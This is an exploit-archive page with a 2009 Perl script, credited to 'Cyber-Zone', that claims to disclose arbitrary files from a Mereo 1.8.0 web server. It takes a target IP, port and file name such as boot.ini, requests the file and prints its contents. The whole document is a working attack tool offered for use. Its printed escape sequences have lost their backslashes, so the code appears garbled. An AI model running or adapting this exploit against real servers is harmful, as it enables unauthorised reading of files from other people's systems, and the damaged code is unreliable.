[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mereo 1.8.0 Arbitrary File Disclosure Exploit
# Published : 2009-05-11
# Author : Cyber-Zone
# Previous Title : Zervit Webserver 0.4 Directory Traversal / Memory Corruption PoC
# Next Title : 32bit FTP (PASV) Reply Client Remote Overflow Exploit (meta)
#!/usr/bin/perl -w
#
# Found By : Cyber-Zone (ABDELKHALEK)
# Paradis_des_fous@hotmail.fr
#
#
# Note : Don't use this for your own R!sk :d
#
#
# Thanx To All Friends : Hussin X , Jiko , Stack , SimO-sofT , r1z , ZoRLu , Mag!c ompo , ThE g0bL!N , b0rizq , All MoroCCaN Hackers
#
# demo version Tested under my MS WINDOWS sp2
#
#
use LWP::Simple;
use LWP::UserAgent;
print "tMereo 1.8.0 Arbitrary File Disclosure Exploitn";
print "t****************************************************************n";
print "t* Found And Exploited By : Cyber-Zone (ABDELKHALEK) *n";
print "t* E-mail : Paradis_des_fous[at]hotmail.fr *n";
print "t* Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM *n";
print "t* From : MoroccO Figuig/Oujda City *n";
print "t****************************************************************nnnn";
if(@ARGV < 4)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 HackerName IP Port Filen";
print "[X] Exemple : perl $0 Cyber-Zone 127.0.0.1 80 boot.inin";
}
($HackerName, $TargetIP, $AttackedPort, $TargetFile) = @ARGV;
print("Please Wait ! Connecting To The Server ......nn");
sleep(5);
print(" ******************************n");
print(" * Status *n");
print(" ******************************n");
print("Loading ........................................nnn");
$temp="/";
my $boom = "http://" . $TargetIP . ":" . $AttackedPort . $temp . $TargetFile;
print("Exploiting .....> |80n");
sleep(15);
print("Exploiting ..........|Done!n");
sleep(5);
$Disclosure=get $boom;
if($Disclosure){
print("nnnn............File Contents Are Just Below...........n");
print("$Disclosure n");
print(".........................EOF.......................n");
print("Done For Fun //Figuigian HaCkern");
print("Some Womens Makes The World Special , Just By Being On it <3n");
print("SEE U $HackerNamennn");
}
else
{
print(" Not Found !!!nn");
exit;
}
# www.Syue.com [2009-05-11]